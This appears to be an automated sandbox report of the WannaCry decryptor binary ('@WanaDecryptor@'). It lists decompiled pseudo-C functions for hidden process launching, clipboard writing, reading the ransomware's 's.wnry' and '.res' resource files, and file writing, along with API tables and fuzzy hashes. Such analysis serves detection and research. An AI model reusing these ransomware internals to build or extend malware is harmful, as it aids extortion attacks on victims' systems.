                                  • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                  • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407CB0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00407CB0() {
				char _v8;
				intOrPtr _v16;
				char _v28;
				char _v40;
				void* _v104;
				void* _v168;
				char _v260;
				void* _v264;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t35;

				_push(0xffffffff);
				_push(E00413F77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t35 = _t34 - 0xfc;
				E004030E0( &_v260, 0);
				_v8 = 0;
				L00412B72();
				_v8 = 1;
				_t24 =  &_v28;
				_v28 = 0x415c00;
				 *_t35 = _t24;
				_v8 = 5;
				L00412D52();
				_v28 = 0x415bec;
				 *_t35 =  &_v40;
				_v40 = 0x415c00;
				_v8 = 6;
				L00412D52();
				_v40 = 0x415bec;
				_v8 = 2;
				L00412D4C();
				_v8 = 1;
				L00412D3A();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return _t24;
			}














                                  0x00407cb0
                                  0x00407cb2
                                  0x00407cbd
                                  0x00407cbe
                                  0x00407cc5
                                  0x00407cd1
                                  0x00407cda
                                  0x00407ce5
                                  0x00407cea
                                  0x00407cf5
                                  0x00407cfc
                                  0x00407d07
                                  0x00407d12
                                  0x00407d1a
                                  0x00407d26
                                  0x00407d31
                                  0x00407d35
                                  0x00407d47
                                  0x00407d4f
                                  0x00407d5b
                                  0x00407d66
                                  0x00407d6e
                                  0x00407d77
                                  0x00407d7f
                                  0x00407d88
                                  0x00407d93
                                  0x00407d9f
                                  0x00407dac

                                  APIs
                                    • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  • #2514.MFC42 ref: 00407CE5
                                  • #2414.MFC42 ref: 00407D1A
                                  • #2414.MFC42 ref: 00407D4F
                                  • #616.MFC42 ref: 00407D6E
                                  • #693.MFC42 ref: 00407D7F
                                  • #641.MFC42 ref: 00407D93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#567$#2514#324#616#641#693
                                  • String ID: [A$[A
                                  • API String ID: 3779294304-353784214
                                  • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                  • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C240 Relevance: 13.7, APIs: 9, Instructions: 195windowfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v34;
				long _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v65;
				char _v68;
				int _v76;
				char _v77;
				void* _t57;
				intOrPtr* _t68;
				signed int _t76;
				struct HWND__* _t92;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t118;
				intOrPtr* _t120;
				long _t133;
				struct _IO_FILE* _t136;
				struct HWND__* _t138;
				signed int _t140;
				int _t141;
				intOrPtr _t143;
				void* _t144;

				_push(0xffffffff);
				_push(E004142DB);
				 *[fs:0x0] = _t143;
				E00413060(0x240c, __ecx,  *[fs:0x0]);
				_push(_t140);
				E0040DBB0( &_v0, 0x1000);
				_a9220 = 0;
				_push( &_v4);
				_t141 = _t140 | 0xffffffff;
				_t57 = E0040BED0(_a9228, _a9232, 0xc);
				_t144 = _t143 + 0x10;
				if(_t57 == 0) {
					_t138 = _a9272;
					if(_t138 != 0) {
						SendMessageA(_t138, 0x4e20, 0, 0);
					}
					_push(8);
					_push(_a9240);
					E0040DC00( &_v0);
					_v12 = _a9236;
					_push(4);
					_push( &_v12);
					E0040DC00( &_v8);
					E0040DD00( &_v16, _a9240);
					E0040DD00( &_v20, _a9240);
					_push(1);
					_push( &_v34);
					_v34 = _a9240;
					E0040DC00( &_v24);
					_t133 = _a9220;
					_push(4);
					_push( &_v36);
					_v36 = _t133;
					E0040DC00( &_v32);
					_push(_t133);
					_push(_a9208);
					E0040DC00( &_v40);
					_t68 =  *0x422210; // 0xb7d178
					_push(0);
					_push(E0040DD40( &_v48));
					_push(E0040DD30( &_v48));
					_push(7);
					if( *((intOrPtr*)( *_t68 + 0x18))() >= 0) {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0, 0);
						}
						_t113 =  *0x422210; // 0xb7d178
						_push( &_v64);
						_push( &_a4060);
						_v64 = 0x13ec;
						_push( &_v65);
						if( *((intOrPtr*)( *_t113 + 0x1c))() >= 0) {
							if(_v77 == 7) {
								_t141 = 0;
								if(_v76 > 0) {
									_t136 = fopen(_a9200, "wb");
									_t144 = _t144 + 8;
									if(_t136 != 0) {
										fwrite( &_a4048, 1, _v76, _t136);
										fclose(_t136);
										_t144 = _t144 + 0x14;
										_t141 = 1;
									}
								}
							}
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, _t141, 0);
							}
							_t114 =  *0x422210; // 0xb7d178
							 *((intOrPtr*)( *_t114 + 0xc))();
							_a9156 = 0xffffffff;
							L23:
							E0040DBF0( &_v68);
							_t76 = _t141;
						} else {
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
							}
							_t118 =  *0x422210; // 0xb7d178
							 *((intOrPtr*)( *_t118 + 0xc))();
							_a9156 = 0xffffffff;
							_t76 = E0040DBF0( &_v68) | 0xffffffff;
						}
						goto L24;
					} else {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
						}
						_t120 =  *0x422210; // 0xb7d178
						 *((intOrPtr*)( *_t120 + 0xc))();
						_a9168 = 0xffffffff;
						_t76 = E0040DBF0( &_v56) | 0xffffffff;
						L24:
						 *[fs:0x0] = _a9148;
						return _t76;
					}
				}
				_t92 = _a9272;
				if(_t92 != 0) {
					SendMessageA(_t92, 0x4e20, _t141, 0);
				}
				_a9224 = _t141;
				goto L23;
			}




































                                  0x0040c240
                                  0x0040c248
                                  0x0040c253
                                  0x0040c25a
                                  0x0040c260
                                  0x0040c26c
                                  0x0040c283
                                  0x0040c28e
                                  0x0040c293
                                  0x0040c296
                                  0x0040c29b
                                  0x0040c2a0
                                  0x0040c2c8
                                  0x0040c2d7
                                  0x0040c2e3
                                  0x0040c2e3
                                  0x0040c2ec
                                  0x0040c2ee
                                  0x0040c2f3
                                  0x0040c303
                                  0x0040c307
                                  0x0040c309
                                  0x0040c30e
                                  0x0040c31f
                                  0x0040c330
                                  0x0040c340
                                  0x0040c342
                                  0x0040c347
                                  0x0040c34b
                                  0x0040c350
                                  0x0040c35b
                                  0x0040c35d
                                  0x0040c362
                                  0x0040c366
                                  0x0040c372
                                  0x0040c373
                                  0x0040c378
                                  0x0040c37d
                                  0x0040c382
                                  0x0040c38f
                                  0x0040c39f
                                  0x0040c3a0
                                  0x0040c3a7
                                  0x0040c3e2
                                  0x0040c3ee
                                  0x0040c3ee
                                  0x0040c3f0
                                  0x0040c3fa
                                  0x0040c402
                                  0x0040c403
                                  0x0040c411
                                  0x0040c417
                                  0x0040c452
                                  0x0040c458
                                  0x0040c45c
                                  0x0040c470
                                  0x0040c472
                                  0x0040c477
                                  0x0040c489
                                  0x0040c48f
                                  0x0040c494
                                  0x0040c497
                                  0x0040c497
                                  0x0040c477
                                  0x0040c45c
                                  0x0040c49e
                                  0x0040c4a9
                                  0x0040c4a9
                                  0x0040c4ab
                                  0x0040c4b3
                                  0x0040c4b6
                                  0x0040c4c1
                                  0x0040c4c5
                                  0x0040c4ca
                                  0x0040c419
                                  0x0040c41b
                                  0x0040c427
                                  0x0040c427
                                  0x0040c429
                                  0x0040c431
                                  0x0040c438
                                  0x0040c448
                                  0x0040c448
                                  0x00000000
                                  0x0040c3a9
                                  0x0040c3ab
                                  0x0040c3b7
                                  0x0040c3b7
                                  0x0040c3b9
                                  0x0040c3c1
                                  0x0040c3c8
                                  0x0040c3d8
                                  0x0040c4cc
                                  0x0040c4d7
                                  0x0040c4e4
                                  0x0040c4e4
                                  0x0040c3a7
                                  0x0040c2a2
                                  0x0040c2ab
                                  0x0040c2b6
                                  0x0040c2b6
                                  0x0040c2bc
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                  • fopen.MSVCRT ref: 0040C46B
                                  • fwrite.MSVCRT ref: 0040C489
                                  • fclose.MSVCRT ref: 0040C48F
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823fclosefopenfwrite
                                  • String ID:
                                  • API String ID: 1132507536-0
                                  • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                  • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68processsynchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _STARTUPINFOA _v68;
				struct _PROCESS_INFORMATION _v84;
				void* _t21;
				long _t25;
				DWORD* _t30;

				_v68.cb = 0x44;
				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
				_v84.hThread = _t21;
				_v84.dwProcessId = _t21;
				_v84.dwThreadId = _t21;
				_v84.hProcess = 0;
				_v68.dwFlags = 1;
				_v68.wShowWindow = 0;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84) == 0) {
					return 0;
				} else {
					_t25 = _a8;
					if(_t25 != 0) {
						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
							TerminateProcess(_v84.hProcess, 0xffffffff);
						}
						_t30 = _a12;
						if(_t30 != 0) {
							GetExitCodeProcess(_v84.hProcess, _t30);
						}
					}
					CloseHandle(_v84);
					CloseHandle(_v84.hThread);
					return 1;
				}
			}








                                  0x00401aa0
                                  0x00401aa8
                                  0x00401ab5
                                  0x00401abb
                                  0x00401ac5
                                  0x00401ad2
                                  0x00401ad6
                                  0x00401ade
                                  0x00401aeb
                                  0x00401b4c
                                  0x00401aed
                                  0x00401aed
                                  0x00401af3
                                  0x00401b03
                                  0x00401b0c
                                  0x00401b0c
                                  0x00401b12
                                  0x00401b18
                                  0x00401b20
                                  0x00401b20
                                  0x00401b18
                                  0x00401b31
                                  0x00401b38
                                  0x00401b44
                                  0x00401b44

                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                  • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                  • String ID: D
                                  • API String ID: 786732093-2746444292
                                  • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                  • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407C30 Relevance: 12.0, APIs: 8, Instructions: 48clipboardmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00407C30(void* __ecx) {
				int _t9;
				void* _t15;
				void* _t22;
				signed int _t25;
				signed int _t26;
				void* _t39;
				void* _t40;

				_t39 = __ecx;
				_t9 = OpenClipboard( *(__ecx + 0x20));
				if(_t9 == 0) {
					return _t9;
				} else {
					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
					if(_t22 != 0) {
						EmptyClipboard();
						_t40 =  *(_t39 + 0x508);
						_t15 = GlobalLock(_t22);
						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
						_t26 = _t25 >> 2;
						memcpy(_t15, _t40, _t26 << 2);
						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
						GlobalUnlock(_t22);
						SetClipboardData(1, _t22);
						return CloseClipboard();
					}
					return CloseClipboard();
				}
			}










                                  0x00407c32
                                  0x00407c38
                                  0x00407c40
                                  0x00407cab
                                  0x00407c42
                                  0x00407c55
                                  0x00407c59
                                  0x00407c66
                                  0x00407c6c
                                  0x00407c79
                                  0x00407c7f
                                  0x00407c86
                                  0x00407c89
                                  0x00407c90
                                  0x00407c92
                                  0x00407c9b
                                  0x00000000
                                  0x00407ca8
                                  0x00407c63
                                  0x00407c63

                                  APIs
                                  • OpenClipboard.USER32(?), ref: 00407C38
                                  • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                  • CloseClipboard.USER32 ref: 00407C5B
                                  • EmptyClipboard.USER32 ref: 00407C66
                                  • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                  • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                  • CloseClipboard.USER32 ref: 00407CA1
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                  • String ID:
                                  • API String ID: 142981918-0
                                  • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                  • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402F10 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 2613176527-0
                                  • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                  • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407F80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E00407F80(void* __ecx) {
				struct _IO_FILE* _t24;
				void* _t30;
				void* _t37;
				void* _t38;
				signed int _t45;
				signed int _t48;
				signed int _t51;
				unsigned int _t53;
				signed int _t54;
				void* _t66;
				struct _IO_FILE* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;

				_t79 = __ecx;
				 *((char*)(_t81 + 0xc)) = 0;
				memset(_t81 + 0xd, 0, 0xc << 2);
				_t82 = _t81 + 0xc;
				asm("stosb");
				 *((intOrPtr*)(_t82 + 0x40)) = 0;
				memset(_t82 + 0x44, 0, 0x21 << 2);
				_t24 = fopen("00000000.res", "rb");
				_t76 = _t24;
				_t84 = _t82 + 0x14;
				_t89 = _t76;
				if(_t76 != 0) {
					fread(_t84 + 0x48, 0x88, 1, _t76);
					fclose(_t76);
					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
					_t45 = _t84 + 0x60;
					_push(_t84 + 0x2c);
					_t66 = _t79 + 0x5f0;
					_push("+++");
					_push(_t45);
					_push(_t66);
					_t30 = E0040C4F0(_t38, _t45, _t89);
					_t85 = _t84 + 0x30;
					_t77 = _t30;
					E0040C670();
					_t90 = _t77 - 0xffffffff;
					if(_t77 == 0xffffffff) {
						_push(_t85 + 0xc);
						_push("+++");
						_push(_t85 + 0x40);
						_push(_t66);
						_t37 = E0040C4F0(_t38, _t45, _t90);
						_t85 = _t85 + 0x10;
						_t77 = _t37;
					}
					_t24 = E0040C670();
					if(_t77 == 1) {
						_t24 = 0;
						asm("repne scasb");
						_t48 =  !(_t45 | 0xffffffff) - 1;
						if(_t48 >= 0x1e) {
							asm("repne scasb");
							_t51 =  !(_t48 | 0xffffffff) - 1;
							if(_t51 < 0x32) {
								asm("repne scasb");
								_t53 =  !(_t51 | 0xffffffff);
								_t78 = _t85 + 0xc - _t53;
								_t54 = _t53 >> 2;
								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
								return E00401A10(_t79 + 0x50c, 0);
							}
						}
					}
				}
				return _t24;
			}





















                                  0x00407f88
                                  0x00407f96
                                  0x00407f9b
                                  0x00407f9b
                                  0x00407f9d
                                  0x00407fa9
                                  0x00407fbb
                                  0x00407fbd
                                  0x00407fc3
                                  0x00407fc5
                                  0x00407fc8
                                  0x00407fca
                                  0x00407fdd
                                  0x00407fe4
                                  0x00407ffd
                                  0x00408006
                                  0x0040800a
                                  0x0040800b
                                  0x00408011
                                  0x00408016
                                  0x00408017
                                  0x00408018
                                  0x0040801d
                                  0x00408020
                                  0x00408022
                                  0x00408027
                                  0x0040802a
                                  0x00408034
                                  0x00408035
                                  0x0040803a
                                  0x0040803b
                                  0x0040803c
                                  0x00408041
                                  0x00408044
                                  0x00408044
                                  0x00408046
                                  0x0040804e
                                  0x00408057
                                  0x00408059
                                  0x0040805d
                                  0x00408061
                                  0x0040806a
                                  0x0040806e
                                  0x00408072
                                  0x0040807b
                                  0x0040807d
                                  0x00408089
                                  0x00408093
                                  0x004080a0
                                  0x00000000
                                  0x004080a7
                                  0x00408072
                                  0x00408061
                                  0x0040804e
                                  0x004080b3

                                  APIs
                                  • fopen.MSVCRT ref: 00407FBD
                                  • fread.MSVCRT ref: 00407FDD
                                  • fclose.MSVCRT ref: 00407FE4
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                    • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy$fclosefopenfread
                                  • String ID: +++$00000000.res$s.wnry
                                  • API String ID: 3363958884-869915597
                                  • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                  • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403860 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43windowthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00403860(void* __ecx) {
				int _t6;
				long _t7;
				void* _t9;
				void* _t14;

				_t14 = __ecx;
				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
				_push(0);
				if(_t6 != 0xffffffff) {
					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
					if(_t7 != 0) {
						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
						 *(_t14 + 0xf4) = _t9;
						return _t9;
					}
					return _t7;
				} else {
					_push(0);
					_push("Please select a host to decrypt.");
					L00412CC8();
					return _t6;
				}
			}







                                  0x00403861
                                  0x0040387a
                                  0x0040387f
                                  0x00403881
                                  0x0040389f
                                  0x004038a3
                                  0x004038b5
                                  0x004038c5
                                  0x004038cb
                                  0x00000000
                                  0x004038cb
                                  0x004038d3
                                  0x00403883
                                  0x00403883
                                  0x00403885
                                  0x0040388a
                                  0x00403891
                                  0x00403891

                                  APIs
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                  • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                  • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                  Strings
                                  • Please select a host to decrypt., xrefs: 00403885
                                  Memory Dump Source
